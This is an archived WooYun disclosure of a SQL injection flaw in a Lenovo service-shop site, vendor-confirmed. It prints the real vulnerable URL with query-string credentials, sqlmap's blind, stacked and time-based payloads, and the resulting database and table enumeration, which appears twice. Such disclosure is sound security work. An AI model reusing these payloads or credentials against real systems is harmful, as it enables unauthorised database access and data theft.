当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(2) 关注此漏洞

缺陷编号: WooYun-2013-40778

漏洞标题: 联想某分站sql注射漏洞

相关厂商: 联想

漏洞作者: Fireweed

提交时间: 2013-10-23 18:13

公开时间: 2013-12-07 18:14

漏洞类型: SQL注射漏洞

危害等级: 中

自评Rank: 10

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: php+字符类型注射

0人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-10-23: 细节已通知厂商并且等待厂商处理中
2013-10-25: 厂商已经确认,细节仅向厂商公开
2013-11-04: 细节向核心白帽子及相关领域专家公开
2013-11-14: 细节向普通白帽子公开
2013-11-24: 细节向实习白帽子公开
2013-12-07: 细节向公众公开

简要描述:

一个很普通的注射,不过数据还是不少的。

详细说明:

code 区域
http://serviceshop.lenovo.


com.cn/WebAjaxHelper.ashx?commentsno=ab637223-3828-473c-a2be-058e346ec925&sysun=


wsilenovo&sysup=wsi@123lenovo&type=commentsused





code 区域
Place: GET


Parameter: commentsno


    Type: boolean-based blind


    Title: AND boolean-based blind - WHERE or HAVING clause


    Payload: commentsno=ab637223-3828-473c-a2be-058e346ec925' AND 6576=6576 AND


'kKEa'='kKEa&sysun=wsilenovo&sysup=wsi@123lenovo&type=commentsused&_=13774859788


15


    Vector: AND [INFERENCE]





    Type: stacked queries


    Title: Microsoft SQL Server/Sybase stacked queries


    Payload: commentsno=ab637223-3828-473c-a2be-058e346ec925'; WAITFOR DELAY '0:


0:5'--&sysun=wsilenovo&sysup=wsi@123lenovo&type=commentsused&_=1377485978815


    Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--





    Type: AND/OR time-based blind


    Title: Microsoft SQL Server/Sybase time-based blind


    Payload: commentsno=ab637223-3828-473c-a2be-058e346ec925' WAITFOR DELAY '0:0


:5'--&sysun=wsilenovo&sysup=wsi@123lenovo&type=commentsused&_=1377485978815


    Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--





current user: 'web_serviceshop'



current database: 'ServiceShop'



code 区域
available databases [21]:


[*] CACHE_PSCM


[*] EUSSCMS


[*] ibis


[*] ideacms


[*] ideaDriver


[*] LB


[*] master


[*] model


[*] msdb


[*] Pccarer


[*] PremiumATDB


[*] ProductDB


[*] ServiceShop


[*] StaWeb


[*] tempdb


[*] thinkcms


[*] thinkDriver


[*] wsbx


[*] wsi_priv


[*] WSICMS


[*] wsidb





code 区域
[16:06:12] [INFO] the back-end DBMS is Microsoft SQL Server


web server operating system: Windows 2003


web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 6.0


back-end DBMS: Microsoft SQL Server 2008


[16:06:12] [INFO] fetching database names


[16:06:12] [INFO] fetching number of databases


[16:06:12] [INFO] resumed: 21


[16:06:12] [INFO] resumed: CACHE_PSCM


[16:06:12] [INFO] resumed: EUSSCMS


[16:06:12] [INFO] resumed: ibis


[16:06:12] [INFO] resumed: ideacms


[16:06:12] [INFO] resumed: ideaDriver


[16:06:12] [INFO] resumed: LB


[16:06:12] [INFO] resumed: master


[16:06:12] [INFO] resumed: model


[16:06:12] [INFO] resumed: msdb


[16:06:12] [INFO] resumed: Pccarer


[16:06:12] [INFO] resumed: PremiumATDB


[16:06:12] [INFO] resumed: ProductDB


[16:06:12] [INFO] resumed: ServiceShop


[16:06:12] [INFO] resumed: StaWeb


[16:06:12] [INFO] resumed: tempdb


[16:06:12] [INFO] resumed: thinkcms


[16:06:12] [INFO] resumed: thinkDriver


[16:06:12] [INFO] resumed: wsbx


[16:06:12] [INFO] resumed: wsi_priv


[16:06:12] [INFO] resumed: WSICMS


[16:06:12] [INFO] resumed: wsidb


[16:06:13] [INFO] resumed: 0


[16:06:13] [INFO] fetching number of tables for database 'tempdb'


[16:06:13] [INFO] resumed: 0


[16:06:13] [INFO] fetching number of tables for database 'LB'


[16:06:13] [INFO] retrieved:


[16:06:13] [INFO] retrieved:


[16:06:14] [INFO] resumed: 0


[16:06:14] [INFO] fetching number of tables for database 'wsidb'


[16:06:14] [INFO] retrieved:


[16:06:14] [INFO] retrieved:


[16:06:14] [INFO] resumed: 0


[16:06:14] [INFO] fetching number of tables for database 'wsi_priv'


[16:06:14] [INFO] retrieved:


[16:06:14] [INFO] retrieved:


[16:06:15] [INFO] resumed: 0


[16:06:15] [INFO] fetching number of tables for database 'PremiumATDB'


[16:06:15] [INFO] retrieved:


[16:06:15] [INFO] retrieved:


[16:06:15] [INFO] resumed: 0


[16:06:15] [INFO] fetching number of tables for database 'ProductDB'


[16:06:15] [INFO] retrieved:


[16:06:15] [INFO] retrieved:


[16:06:15] [INFO] resumed: 0


[16:06:15] [INFO] fetching number of tables for database 'CACHE_PSCM'


[16:06:15] [INFO] retrieved:


[16:06:16] [INFO] retrieved:


[16:06:16] [INFO] resumed: 0


[16:06:16] [INFO] fetching number of tables for database 'ServiceShop'


[16:06:16] [INFO] resumed: 81


[16:06:16] [INFO] resumed: dbo.ACT_WenDa


[16:06:16] [INFO] resumed: dbo.EP_ClassProductRelation


[16:06:16] [INFO] resumed: dbo.EP_CodeDef


[16:06:16] [INFO] resumed: dbo.EP_CodeDef_temp


[16:06:16] [INFO] resumed: dbo.EP_HomePageProd


[16:06:16] [INFO] resumed: dbo.EP_PassCode


[16:06:16] [INFO] resumed: dbo.EP_PassCode_temp


[16:06:16] [INFO] resumed: dbo.EP_Promotion


[16:06:16] [INFO] resumed: dbo.EP_Promotion_temp


[16:06:16] [INFO] resumed: dbo.EP_PromotionProduct


[16:06:16] [INFO] resumed: dbo.EP_PromotionProduct_temp


[16:06:16] [INFO] resumed: dbo.EP_ServiceProductPrice


[16:06:16] [INFO] resumed: dbo.EP_ServiceProductPrice_temp


[16:06:16] [INFO] resumed: dbo.EP_ServiceProductRel


[16:06:16] [INFO] resumed: dbo.EP_ServiceProductSale


[16:06:16] [INFO] resumed: dbo.EP_ServiceProductSale_bak_20130607


[16:06:16] [INFO] resumed: dbo.EP_ServiceProductSale_temp


[16:06:16] [INFO] resumed: dbo.MD_ServiceProduct


[16:06:16] [INFO] resumed: dbo.MD_ServiceProduct_20130124


[16:06:16] [INFO] resumed: dbo.MD_ServiceProduct_temp


[16:06:16] [INFO] resumed: dbo.SS_Agreement


[16:06:16] [INFO] resumed: dbo.SS_Attachments


[16:06:16] [INFO] resumed: dbo.SS_BigClass


[16:06:16] [INFO] resumed: dbo.SS_BigSmallClassRel


[16:06:16] [INFO] resumed: dbo.SS_Cart


[16:06:16] [INFO] resumed: dbo.SS_CartItem


[16:06:16] [INFO] resumed: dbo.SS_ClassInfo


[16:06:16] [INFO] resumed: dbo.SS_ClassProduct


[16:06:16] [INFO] resumed: dbo.SS_ClassPromotionExt


[16:06:16] [INFO] resumed: dbo.SS_Collection


[16:06:16] [INFO] resumed: dbo.SS_Could_Requests


[16:06:16] [INFO] resumed: dbo.SS_Delivery


[16:06:16] [INFO] resumed: dbo.SS_DictionaryValue


[16:06:16] [INFO] resumed: dbo.SS_DiscountRecord


[16:06:16] [INFO] resumed: dbo.SS_ErrorLog


[16:06:16] [INFO] resumed: dbo.SS_Evaluation


[16:06:16] [INFO] resumed: dbo.SS_EvaluationReply


[16:06:16] [INFO] resumed: dbo.SS_Explain


[16:06:16] [INFO] resumed: dbo.SS_FeedBack


[16:06:16] [INFO] resumed: dbo.SS_GroupInfo


[16:06:16] [INFO] resumed: dbo.SS_GroupProduct


[16:06:16] [INFO] resumed: dbo.SS_GroupPurchase


[16:06:16] [INFO] resumed: dbo.SS_Invoice


[16:06:16] [INFO] resumed: dbo.SS_LimitBuy


[16:06:16] [INFO] resumed: dbo.SS_LoginLog


[16:06:16] [INFO] resumed: dbo.SS_MyDiscount


[16:06:16] [INFO] resumed: dbo.SS_News


[16:06:16] [INFO] resumed: dbo.SS_PayLog


[16:06:16] [INFO] resumed: dbo.SS_PointsDiscount


[16:06:16] [INFO] resumed: dbo.SS_PointsRecord


[16:06:16] [INFO] resumed: dbo.SS_PointsRule


[16:06:16] [INFO] resumed: dbo.SS_PromExtItem


[16:06:16] [INFO] resumed: dbo.SS_PromotionExt


[16:06:16] [INFO] resumed: dbo.SS_SaleOrder


[16:06:16] [INFO] resumed: dbo.SS_SaleOrderLine


[16:06:16] [INFO] resumed: dbo.SS_SerchDictionary


[16:06:16] [INFO] resumed: dbo.SS_ServiceCouponInfo


[16:06:16] [INFO] resumed: dbo.SS_ServiceLucky


[16:06:16] [INFO] resumed: dbo.SS_ServicePrizeDetail


[16:06:16] [INFO] resumed: dbo.SS_ServiceProductAgreement


[16:06:16] [INFO] resumed: dbo.SS_ServiceProductExt


[16:06:16] [INFO] resumed: dbo.SS_SmallClass


[16:06:16] [INFO] resumed: dbo.SS_SmallClassProduct


[16:06:16] [INFO] resumed: dbo.SS_UserPoints


[16:06:16] [INFO] resumed: dbo.SS_Value


[16:06:16] [INFO] resumed: dbo.SS_VIP_User


[16:06:16] [INFO] resumed: dbo.SS_VIP_User2


[16:06:16] [INFO] resumed: dbo.SS_VisitLog


[16:06:16] [INFO] resumed: dbo.SS_VM_GroupPurchase_Order


[16:06:16] [INFO] resumed: dbo.SS_VM_LimitBuy_cs_Order


[16:06:16] [INFO] resumed: dbo.SS_VW_BianJiBuChongProduct


[16:06:16] [INFO] resumed: dbo.SS_VW_Evaluation


[16:06:16] [INFO] resumed: dbo.SS_VW_GroupProduct


[16:06:16] [INFO] resumed: dbo.SS_VW_ProductExt


[16:06:16] [INFO] resumed: dbo.SS_VW_PromotionBuy


[16:06:16] [INFO] resumed: dbo.SS_VW_SmallClassProduct


[16:06:16] [INFO] resumed: dbo.SS_WebserviceLog


[16:06:16] [INFO] resumed: dbo.SS_WebServiceRules


[16:06:16] [INFO] resumed: dbo.tbl_Zone


[16:06:16] [INFO] resumed: dbo.tbl_Zone_20121112


[16:06:16] [INFO] resumed: dbo.tbl_Zone_temp


[16:06:16] [INFO] fetching number of tables for database 'ibis'


[16:06:16] [INFO] retrieved:


[16:06:16] [INFO] retrieved:


[16:06:17] [INFO] resumed: 0


[16:06:17] [INFO] fetching number of tables for database 'EUSSCMS'


[16:06:17] [INFO] retrieved:


[16:06:17] [INFO] retrieved:


[16:06:17] [INFO] resumed: 0


[16:06:17] [INFO] fetching number of tables for database 'master'


[16:06:17] [INFO] resumed: 363


[16:06:17] [INFO] resumed: dbo.spt_fallback_db


[16:06:17] [INFO] resumed: dbo.spt_fallback_dev


[16:06:17] [INFO] resumed: dbo.spt_fallback_usg


[16:06:17] [INFO] resumed: dbo.spt_monitor


[16:06:17] [INFO] resumed: dbo.spt_values


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.CHECK_CONSTRAINTS


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.COLUMN_PRIVILEGES


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.COLUMNS


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.DOMAINS


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.KEY_COLUMN_USAGE


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.PARAMETERS


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.ROUTINE_COLUMNS


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.ROUTINES


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.SCHEMATA


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.TABLE_CONSTRAINTS


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.TABLE_PRIVILEGES


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.TABLES


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.VIEW_COLUMN_USAGE


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.VIEW_TABLE_USAGE


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.VIEWS


[16:06:17] [INFO] resumed: sys.all_columns


[16:06:17] [INFO] resumed: sys.all_objects


[16:06:17] [INFO] resumed: sys.all_parameters


[16:06:17] [INFO] resumed: sys.all_sql_modules


[16:06:17] [INFO] resumed: sys.all_views


[16:06:17] [INFO] resumed: sys.allocation_units


[16:06:17] [INFO] resumed: sys.assemblies


[16:06:17] [INFO] resuming partial value: sys.assembly_f





表太多啦,我就不慢慢跑了。





漏洞证明:

code 区域
available databases [21]:


[*] CACHE_PSCM


[*] EUSSCMS


[*] ibis


[*] ideacms


[*] ideaDriver


[*] LB


[*] master


[*] model


[*] msdb


[*] Pccarer


[*] PremiumATDB


[*] ProductDB


[*] ServiceShop


[*] StaWeb


[*] tempdb


[*] thinkcms


[*] thinkDriver


[*] wsbx


[*] wsi_priv


[*] WSICMS


[*] wsidb





code 区域
[16:06:12] [INFO] the back-end DBMS is Microsoft SQL Server


web server operating system: Windows 2003


web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 6.0


back-end DBMS: Microsoft SQL Server 2008


[16:06:12] [INFO] fetching database names


[16:06:12] [INFO] fetching number of databases


[16:06:12] [INFO] resumed: 21


[16:06:12] [INFO] resumed: CACHE_PSCM


[16:06:12] [INFO] resumed: EUSSCMS


[16:06:12] [INFO] resumed: ibis


[16:06:12] [INFO] resumed: ideacms


[16:06:12] [INFO] resumed: ideaDriver


[16:06:12] [INFO] resumed: LB


[16:06:12] [INFO] resumed: master


[16:06:12] [INFO] resumed: model


[16:06:12] [INFO] resumed: msdb


[16:06:12] [INFO] resumed: Pccarer


[16:06:12] [INFO] resumed: PremiumATDB


[16:06:12] [INFO] resumed: ProductDB


[16:06:12] [INFO] resumed: ServiceShop


[16:06:12] [INFO] resumed: StaWeb


[16:06:12] [INFO] resumed: tempdb


[16:06:12] [INFO] resumed: thinkcms


[16:06:12] [INFO] resumed: thinkDriver


[16:06:12] [INFO] resumed: wsbx


[16:06:12] [INFO] resumed: wsi_priv


[16:06:12] [INFO] resumed: WSICMS


[16:06:12] [INFO] resumed: wsidb


[16:06:13] [INFO] resumed: 0


[16:06:13] [INFO] fetching number of tables for database 'tempdb'


[16:06:13] [INFO] resumed: 0


[16:06:13] [INFO] fetching number of tables for database 'LB'


[16:06:13] [INFO] retrieved:


[16:06:13] [INFO] retrieved:


[16:06:14] [INFO] resumed: 0


[16:06:14] [INFO] fetching number of tables for database 'wsidb'


[16:06:14] [INFO] retrieved:


[16:06:14] [INFO] retrieved:


[16:06:14] [INFO] resumed: 0


[16:06:14] [INFO] fetching number of tables for database 'wsi_priv'


[16:06:14] [INFO] retrieved:


[16:06:14] [INFO] retrieved:


[16:06:15] [INFO] resumed: 0


[16:06:15] [INFO] fetching number of tables for database 'PremiumATDB'


[16:06:15] [INFO] retrieved:


[16:06:15] [INFO] retrieved:


[16:06:15] [INFO] resumed: 0


[16:06:15] [INFO] fetching number of tables for database 'ProductDB'


[16:06:15] [INFO] retrieved:


[16:06:15] [INFO] retrieved:


[16:06:15] [INFO] resumed: 0


[16:06:15] [INFO] fetching number of tables for database 'CACHE_PSCM'


[16:06:15] [INFO] retrieved:


[16:06:16] [INFO] retrieved:


[16:06:16] [INFO] resumed: 0


[16:06:16] [INFO] fetching number of tables for database 'ServiceShop'


[16:06:16] [INFO] resumed: 81


[16:06:16] [INFO] resumed: dbo.ACT_WenDa


[16:06:16] [INFO] resumed: dbo.EP_ClassProductRelation


[16:06:16] [INFO] resumed: dbo.EP_CodeDef


[16:06:16] [INFO] resumed: dbo.EP_CodeDef_temp


[16:06:16] [INFO] resumed: dbo.EP_HomePageProd


[16:06:16] [INFO] resumed: dbo.EP_PassCode


[16:06:16] [INFO] resumed: dbo.EP_PassCode_temp


[16:06:16] [INFO] resumed: dbo.EP_Promotion


[16:06:16] [INFO] resumed: dbo.EP_Promotion_temp


[16:06:16] [INFO] resumed: dbo.EP_PromotionProduct


[16:06:16] [INFO] resumed: dbo.EP_PromotionProduct_temp


[16:06:16] [INFO] resumed: dbo.EP_ServiceProductPrice


[16:06:16] [INFO] resumed: dbo.EP_ServiceProductPrice_temp


[16:06:16] [INFO] resumed: dbo.EP_ServiceProductRel


[16:06:16] [INFO] resumed: dbo.EP_ServiceProductSale


[16:06:16] [INFO] resumed: dbo.EP_ServiceProductSale_bak_20130607


[16:06:16] [INFO] resumed: dbo.EP_ServiceProductSale_temp


[16:06:16] [INFO] resumed: dbo.MD_ServiceProduct


[16:06:16] [INFO] resumed: dbo.MD_ServiceProduct_20130124


[16:06:16] [INFO] resumed: dbo.MD_ServiceProduct_temp


[16:06:16] [INFO] resumed: dbo.SS_Agreement


[16:06:16] [INFO] resumed: dbo.SS_Attachments


[16:06:16] [INFO] resumed: dbo.SS_BigClass


[16:06:16] [INFO] resumed: dbo.SS_BigSmallClassRel


[16:06:16] [INFO] resumed: dbo.SS_Cart


[16:06:16] [INFO] resumed: dbo.SS_CartItem


[16:06:16] [INFO] resumed: dbo.SS_ClassInfo


[16:06:16] [INFO] resumed: dbo.SS_ClassProduct


[16:06:16] [INFO] resumed: dbo.SS_ClassPromotionExt


[16:06:16] [INFO] resumed: dbo.SS_Collection


[16:06:16] [INFO] resumed: dbo.SS_Could_Requests


[16:06:16] [INFO] resumed: dbo.SS_Delivery


[16:06:16] [INFO] resumed: dbo.SS_DictionaryValue


[16:06:16] [INFO] resumed: dbo.SS_DiscountRecord


[16:06:16] [INFO] resumed: dbo.SS_ErrorLog


[16:06:16] [INFO] resumed: dbo.SS_Evaluation


[16:06:16] [INFO] resumed: dbo.SS_EvaluationReply


[16:06:16] [INFO] resumed: dbo.SS_Explain


[16:06:16] [INFO] resumed: dbo.SS_FeedBack


[16:06:16] [INFO] resumed: dbo.SS_GroupInfo


[16:06:16] [INFO] resumed: dbo.SS_GroupProduct


[16:06:16] [INFO] resumed: dbo.SS_GroupPurchase


[16:06:16] [INFO] resumed: dbo.SS_Invoice


[16:06:16] [INFO] resumed: dbo.SS_LimitBuy


[16:06:16] [INFO] resumed: dbo.SS_LoginLog


[16:06:16] [INFO] resumed: dbo.SS_MyDiscount


[16:06:16] [INFO] resumed: dbo.SS_News


[16:06:16] [INFO] resumed: dbo.SS_PayLog


[16:06:16] [INFO] resumed: dbo.SS_PointsDiscount


[16:06:16] [INFO] resumed: dbo.SS_PointsRecord


[16:06:16] [INFO] resumed: dbo.SS_PointsRule


[16:06:16] [INFO] resumed: dbo.SS_PromExtItem


[16:06:16] [INFO] resumed: dbo.SS_PromotionExt


[16:06:16] [INFO] resumed: dbo.SS_SaleOrder


[16:06:16] [INFO] resumed: dbo.SS_SaleOrderLine


[16:06:16] [INFO] resumed: dbo.SS_SerchDictionary


[16:06:16] [INFO] resumed: dbo.SS_ServiceCouponInfo


[16:06:16] [INFO] resumed: dbo.SS_ServiceLucky


[16:06:16] [INFO] resumed: dbo.SS_ServicePrizeDetail


[16:06:16] [INFO] resumed: dbo.SS_ServiceProductAgreement


[16:06:16] [INFO] resumed: dbo.SS_ServiceProductExt


[16:06:16] [INFO] resumed: dbo.SS_SmallClass


[16:06:16] [INFO] resumed: dbo.SS_SmallClassProduct


[16:06:16] [INFO] resumed: dbo.SS_UserPoints


[16:06:16] [INFO] resumed: dbo.SS_Value


[16:06:16] [INFO] resumed: dbo.SS_VIP_User


[16:06:16] [INFO] resumed: dbo.SS_VIP_User2


[16:06:16] [INFO] resumed: dbo.SS_VisitLog


[16:06:16] [INFO] resumed: dbo.SS_VM_GroupPurchase_Order


[16:06:16] [INFO] resumed: dbo.SS_VM_LimitBuy_cs_Order


[16:06:16] [INFO] resumed: dbo.SS_VW_BianJiBuChongProduct


[16:06:16] [INFO] resumed: dbo.SS_VW_Evaluation


[16:06:16] [INFO] resumed: dbo.SS_VW_GroupProduct


[16:06:16] [INFO] resumed: dbo.SS_VW_ProductExt


[16:06:16] [INFO] resumed: dbo.SS_VW_PromotionBuy


[16:06:16] [INFO] resumed: dbo.SS_VW_SmallClassProduct


[16:06:16] [INFO] resumed: dbo.SS_WebserviceLog


[16:06:16] [INFO] resumed: dbo.SS_WebServiceRules


[16:06:16] [INFO] resumed: dbo.tbl_Zone


[16:06:16] [INFO] resumed: dbo.tbl_Zone_20121112


[16:06:16] [INFO] resumed: dbo.tbl_Zone_temp


[16:06:16] [INFO] fetching number of tables for database 'ibis'


[16:06:16] [INFO] retrieved:


[16:06:16] [INFO] retrieved:


[16:06:17] [INFO] resumed: 0


[16:06:17] [INFO] fetching number of tables for database 'EUSSCMS'


[16:06:17] [INFO] retrieved:


[16:06:17] [INFO] retrieved:


[16:06:17] [INFO] resumed: 0


[16:06:17] [INFO] fetching number of tables for database 'master'


[16:06:17] [INFO] resumed: 363


[16:06:17] [INFO] resumed: dbo.spt_fallback_db


[16:06:17] [INFO] resumed: dbo.spt_fallback_dev


[16:06:17] [INFO] resumed: dbo.spt_fallback_usg


[16:06:17] [INFO] resumed: dbo.spt_monitor


[16:06:17] [INFO] resumed: dbo.spt_values


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.CHECK_CONSTRAINTS


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.COLUMN_PRIVILEGES


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.COLUMNS


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.DOMAINS


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.KEY_COLUMN_USAGE


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.PARAMETERS


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.ROUTINE_COLUMNS


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.ROUTINES


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.SCHEMATA


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.TABLE_CONSTRAINTS


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.TABLE_PRIVILEGES


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.TABLES


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.VIEW_COLUMN_USAGE


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.VIEW_TABLE_USAGE


[16:06:17] [INFO] resumed: INFORMATION_SCHEMA.VIEWS


[16:06:17] [INFO] resumed: sys.all_columns


[16:06:17] [INFO] resumed: sys.all_objects


[16:06:17] [INFO] resumed: sys.all_parameters


[16:06:17] [INFO] resumed: sys.all_sql_modules


[16:06:17] [INFO] resumed: sys.all_views


[16:06:17] [INFO] resumed: sys.allocation_units


[16:06:17] [INFO] resumed: sys.assemblies


[16:06:17] [INFO] resuming partial value: sys.assembly_f

修复方案:

过滤或者参数化查询哦亲

版权声明:转载请注明来源 Fireweed@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-10-25 10:44

厂商回复:

感谢您对联想安全做出的贡献!我们将立即评估与修复相关漏洞

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2013-11-24 11:10 | HackBraid 认证白帽子 ( 普通白帽子 | Rank:1854 漏洞数:296 | 风暴网络安全空间: http://www.heysec.or...)
    0

    你好!请教下这是工具测得吗?

    1# 回复此人
  2. 2013-12-07 19:49 | Murk Emissary ( 实习白帽子 | Rank:74 漏洞数:14 | 低调做人 低调行事)
    0

    @HackBraid 肯定是啊backtrack下的sqlmap工具

    2# 回复此人
  3. 2013-12-07 20:13 | HackBraid 认证白帽子 ( 普通白帽子 | Rank:1854 漏洞数:296 | 风暴网络安全空间: http://www.heysec.or...)
    0

    @Murk Emissary 哦哦,你的那个漏洞也蛮有意思 为啥忽略了

    3# 回复此人

登录后才能发表评论,请先 登录